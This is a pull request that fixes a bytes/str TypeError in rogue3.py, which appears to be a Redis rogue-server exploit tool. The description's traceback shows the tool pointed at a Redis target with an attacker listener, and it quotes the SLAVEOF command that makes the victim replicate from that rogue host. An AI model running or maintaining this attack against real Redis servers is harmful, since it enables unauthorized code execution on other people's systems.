### PR TITLE
fix TypeError, strip can't be used with bytes.

### DIFF
--- a/rogue3.py
+++ b/rogue3.py
@@ -32,7 +32,7 @@ def dout(sock, msg):
     try:
         if type(msg) != bytes:
             msg = msg.encode()
-            msg_list = msg.strip().split("\r\n")
+            msg_list = msg.decode('UTF-8').strip().split("\r\n")
         sock.send(msg)
 
         if type(msg) == bytes:


### PR DESCRIPTION
I fix TypeError.

```
# python3 rogue3.py --rhost redis --rport 6379 --lhost rogue --lport 21000
TARGET redis:6379
SERVER rogue:21000
Traceback (most recent call last):
  File "rogue3.py", line 155, in <module>
    runserver(options.rh, options.rp, options.lh, options.lp)
  File "rogue3.py", line 122, in runserver
    remote.do(f"SLAVEOF {lhost} {lport}")
  File "rogue3.py", line 61, in do
    self.send(mk_cmd(cmd))
  File "rogue3.py", line 55, in send
    dout(self._sock, msg)
  File "rogue3.py", line 35, in dout
    msg_list = msg.strip().split("\r\n")
TypeError: a bytes-like object is required, not 'str'
```

Strip can't be used with byte types.

ref: [python 3: how to make strip() work for bytes - Stack Overflow](https://stackoverflow.com/questions/9560759/python-3-how-to-make-strip-work-for-bytes)